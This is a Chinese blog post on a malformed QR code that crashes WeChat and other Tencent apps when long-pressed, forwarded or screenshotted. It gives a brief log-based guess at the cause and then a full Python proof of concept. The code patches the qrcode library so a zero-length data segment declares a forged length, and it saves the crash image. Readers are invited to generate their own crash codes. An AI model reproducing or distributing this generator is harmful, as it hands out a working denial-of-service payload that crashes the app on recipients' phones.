前言
在昨晚,小薛因在看微信,看到在网传一张疑问的图片,发现点开长按识别,微信就会闪退,于是就好奇的去查明一下具体原理是怎么样的。
![图片[1]-微信bug二维码崩溃漏洞?你要的poc来了!生成自己的二维码-一只薛眠羊](https://www.xuemy.cn/wp-content/uploads/2023/04/1-67.webp)
若打开图片,微信APP会出现闪退情况,经测试,小薛发现腾讯系的应用长按这张图片都会闪退,转发、截图该图片也会闪退。
日志分析
进行日志分析,可以推测是微信OCR扫描器相关功能模块,由于更新时不当处理,该QR代码使其产生error,触发闪退。
![图片[2]-微信bug二维码崩溃漏洞?你要的poc来了!生成自己的二维码-一只薛眠羊](https://www.xuemy.cn/wp-content/uploads/2023/04/2-14-1024x234.webp)
![图片[3]-微信bug二维码崩溃漏洞?你要的poc来了!生成自己的二维码-一只薛眠羊](https://www.xuemy.cn/wp-content/uploads/2023/04/3-11-1024x359.webp)
实现教程
![图片[4]-微信bug二维码崩溃漏洞?你要的poc来了!生成自己的二维码-一只薛眠羊](https://www.xuemy.cn/wp-content/uploads/2023/04/4-8.webp)
使用poc生成代码
![图片[5]-微信bug二维码崩溃漏洞?你要的poc来了!生成自己的二维码-一只薛眠羊](https://www.xuemy.cn/wp-content/uploads/2023/04/5-6.webp)
安装qrcode
pip install qrcode
生成代码
import qrcode
from qrcode.util import QRData, MODE_NUMBER, MODE_8BIT_BYTE
def nvwu_put(self, num, length):
if num == 0:
num = 233 # 制造一个伪造的长度
for i in range(length):
self.put_bit(((num >> (length - i - 1)) & 1) == 1)
qrcode.util.BitBuffer.put = nvwu_put
def anquannvwu():
qr = qrcode.QRCode(2, qrcode.constants.ERROR_CORRECT_M, mask_pattern=0)
num_data = QRData('1145141', MODE_NUMBER)
data = QRData(b'.', MODE_8BIT_BYTE)
hack_data = QRData(b'', MODE_8BIT_BYTE)
# 确保所有数据都适应这个版本的最大内容长度
qr.add_data(num_data)
qr.add_data(data)
qr.add_data(num_data)
qr.add_data(data)
qr.add_data(num_data)
qr.add_data(data)
qr.add_data(num_data)
# 添加一个零长度的数据,使得数据的长度为233
qr.add_data(hack_data)
img = qr.make_image()
img.save("./poc1.png")
if __name__ == "__main__":
anquannvwu()
END
上面的代码做了以下工作:
1. 创建一个新的QR码,纠错等级为M,掩码模式为0。
2. 创建一个新的QR数据,字符串为’1145141’,模式为MODE_NUMBER。
3. 创建一个新的QR数据,字符串为’.’,模式为MODE_8BIT_BYTE。
4. 创建一个新的QR数据,字符串为空,模式为MODE_8BIT_BYTE。
© 版权声明
THE END
暂无评论内容